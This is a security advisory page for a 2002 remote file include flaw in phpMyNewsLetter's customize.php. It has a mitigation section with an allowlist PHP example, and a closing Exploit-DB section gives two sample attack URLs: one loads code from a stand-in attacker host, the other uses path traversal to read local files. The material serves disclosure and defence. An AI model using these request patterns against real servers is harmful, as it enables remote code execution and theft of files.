vendor: phpMyNewsLetter
by: SecurityFocus
CVSS: 7.5 HIGH
File Include Vulnerability
CWE: 98
Product Name: phpMyNewsLetter
2002

phpMyNewsLetter File Include Vulnerability

It is possible to pass an attacker-specified file include location to a CGI parameter of the 'customize.php' script. This may allow an attacker to execute arbitrary commands with the privileges of the webserver. Additionally, an attacker may exploit this problem to view local webserver readable files.

Mitigation:

Ensure that user-supplied input is properly validated and filtered before being used in a file include operation.
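
One way to apply this mitigation, as an added example that is not phpMyNewsLetter's code (the source of 'customize.php' is not shown on this page): the request value is reduced to a key from a fixed allowlist, and the include path is built from that key alone. The function names, the `lang/` directory, the file names and the idea that `l` selects a language file are all assumptions.

```php
<?php
// Added example, not phpMyNewsLetter code. Hypothetical names throughout;
// assumes 'l' is meant to select a language file shipped with the application.

const LANG_FILES = ['en' => 'english.php', 'fr' => 'francais.php']; // allowlist
const LANG_DIR   = __DIR__ . '/lang';                                // assumed layout

// Reduce an untrusted request value to a key that is on the allowlist.
function lang_key($requested, string $default = 'en'): string
{
    // Non-strings (e.g. ?l[]=x) and unknown keys fall back to the default.
    if (is_string($requested) && array_key_exists($requested, LANG_FILES)) {
        return $requested;
    }
    return $default;
}

// Build the include path from the allowlisted key only; null if unusable.
function lang_path(string $key): ?string
{
    $base = realpath(LANG_DIR);
    $path = realpath(LANG_DIR . '/' . LANG_FILES[$key]);
    // Defence in depth: the resolved file must exist inside LANG_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs in the request shapes this advisory describes.
$samples = ['fr', 'http://[attacker]/code.txt', '../path/file/to/view', ['x']];
foreach ($samples as $l) {
    $key  = lang_key($l);
    $path = lang_path($key);
    printf("%-34s -> key=%s path=%s\n",
        json_encode($l, JSON_UNESCAPED_SLASHES), $key, $path ?? '(file not present)');
}

// Handler sketch:
//   $file = lang_path(lang_key($_GET['l'] ?? null));
//   if ($file === null) { http_response_code(500); exit; }
//   require $file;
```

Setting `allow_url_include = Off` in php.ini (the default in current PHP releases) blocks the remote-URL form at the interpreter level but not the local-path form, so the allowlist is still needed.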

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5886/info

A vulnerability has been discovered in phpMyNewsLetter.

Reportedly, it is possible to pass an attacker-specified file include location to a CGI parameter of the 'customize.php' script.

This may allow an attacker to execute arbitrary commands with the privileges of the webserver.

Additionally, an attacker may exploit this problem to view local webserver readable files.

http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With the following in http://[attacker]/code.txt:
<? echo $text; ?>

or
http://[target]/include/customize.php?l=../path/file/to/view